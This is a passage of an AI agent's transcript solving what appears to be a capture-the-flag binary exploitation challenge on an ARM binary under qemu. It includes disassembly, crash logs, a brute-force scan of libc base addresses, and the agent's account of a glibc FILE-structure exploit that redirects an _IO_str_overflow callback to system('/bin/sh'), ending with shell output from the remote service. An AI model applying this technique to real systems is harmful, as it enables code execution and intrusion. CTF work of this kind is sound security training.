  `- args(r0, r1, r2, r3) vars(1:sp[0x2c..0x2c])
  0x00050fc0      2de9f04f       push.w {r4, r5, r6, r7, r8, sb, sl, fp, lr}
  0x00050fc4      83b0           sub sp, 0xc
  0x00050fc6      d0e90781       ldrd r8, r1, [r0, 0x1c]     ; arg1
  0x00050fca      a1eb0801       sub.w r1, r1, r8            ; arg2
  0x00050fce      9142           cmp r1, r2                  ; arg3
  0x00050fd0      5ada           bge 0x51088
  0x00050fd2      0568           ldr r5, [r0]                ; arg1
  0x00050fd4      0169           ldr r1, [r0, 0x10]          ; arg1
  0x00050fd6      15f00105       ands r5, r5, 1
  0x00050fda      d0f818a0       ldr.w sl, [r0, 0x18]        ; arg1
  0x00050fde      0191           str r1, [var_4h]
  0x00050fe0      40f08180       bne.w 0x510e6
  0x00050fe4      02f1640b       add.w fp, r2, 0x64          ; arg3
  0x00050fe8      1f46           mov r7, r3                  ; arg4
  0x00050fea      0446           mov r4, r0
  0x00050fec      d0f8a030       ldr.w r3, [r0, 0xa0]
  0x00050ff0      5846           mov r0, fp
  0x00050ff2      1646           mov r6, r2
  ; DATA XREF from sym._IO_list_resetlock @ +0x10(r)
  0x00050ff4      9847           blx r3
  0x00050ff6      8146           mov sb, r0
  0x00050ff8      0028           cmp r0, 0
  0x00050ffa      74d0           beq 0x510e6
  0x00050ffc      b8f1000f       cmp.w r8, 0
  0x00051000      0ad0           beq 0x51018
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  ```
- **Assistant:**
  ```
  /bin/bash: line 1:   772 Segmentation fault      (core dumped) qemu-arm -g 1240 -L /metadata/armsys /challenge/speed1 < /metadata/fsop_sh.bin
  ```
- **Assistant:**
  ```
  [ANSI banner art omitted]
  num: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  ```
- **Assistant:**
  ```
  /bin/bash: line 1:   787 Segmentation fault      (core dumped) qemu-arm -g 1241 -L /metadata/armsys /challenge/speed1 < /metadata/fsop_sh.bin
  ```
- **Assistant:** The local exploit now works without touching the stack canary: a first line beginning with `0` overflows the copied `stdout` pointer to a fake ARM glibc `_IO_str_jumps` FILE object. The final `printf` calls `_IO_str_overflow`, whose allocation callback I point at `system`, with the computed allocation size equal to the libc `"/bin/sh"` address.
- **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ - **Assistant:** The one-shot works locally, but the first remote attempt did not print command output, which points to a libc load-base mismatch between my local sysroot run and the service wrapper. I’m probing the two qemu layouts I observed locally and will use the one that produces shell output. - **Assistant:** BASE 0x40804000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40810000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x4083a000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x407f0000 len 2364 
mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x407e0000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40800000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40820000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40830000 len 2364 mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' BASE 0x40840000 len 2364 
mark False tail b';34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' - **Assistant:** send_immediate len 2385 has num True tail b'\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: \x1b[1mres:\x1b[0m 0\n' wait_prompt pre len 2369 has num True wait_prompt len 16 has num False tail b' \x1b[1mres:\x1b[0m 0\n' - **Assistant:** BASE 0x4083a000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381413 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' BASE 0x40804000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381419 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' BASE 0x40810000 len 2536 mark False tail b'5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n\nnum: Fatal error: glibc detected an invalid stdio handle\n/home/ctf/run.sh: line 2: 1381422 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ 
█████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: qemu-arm: QEMU: Terminated via GDBstub - **Assistant:** The remote wrapper is using a different ARM libc mapping than my local reproduction, so the valid `_IO_str_jumps` address is shifted. I’m scanning a narrow qemu-user mapping window for the page where glibc accepts the fake vtable; the signal is simple: wrong pages abort with “invalid stdio handle,” the right page reaches the `system` callback. 
- **Assistant:** CAND 0x40803000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4081c000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4085c000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40863000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m 
\x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40882000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x40885000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x4088f000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m 
\x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408a4000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408aa000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408b3000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408ba000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m 
\x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408d0000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408ed000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' CAND 0x408f1000 len 2364 ok False invalid False tail b' \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m \x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m 
\x1b[38;5;34m\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\x1b[0m\n' - **Assistant:** 0 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383001 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 1 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383010 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 2 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383013 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 3 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383016 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 4 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383019 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' 5 val -8687589 hex 0xff7b701b base 0xff6b27fc tail b'sh: line 2: 1383025 Aborted (core dumped) qemu-arm -L /etc/qemu-binfmt/arm ./speed1\n' - **Assistant:** 0x4092e01b 1083367451 0x4092e01b 1083367451 0x4092e01b 1083367451 - **Assistant:** payload newline? False system 0xff6f04cd str 0xff7b5a30 binsh 0xff798f2c old 0x7fbcc764 ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ▀████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ██████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀ num: uid=999(ctf) gid=999(ctf) groups=999(ctf) /home/ctf total 28 drwxr-xr-x 1 root ctf 4096 May 10 18:23 . drwxr-xr-x 1 root root 4096 May 10 18:23 .. 
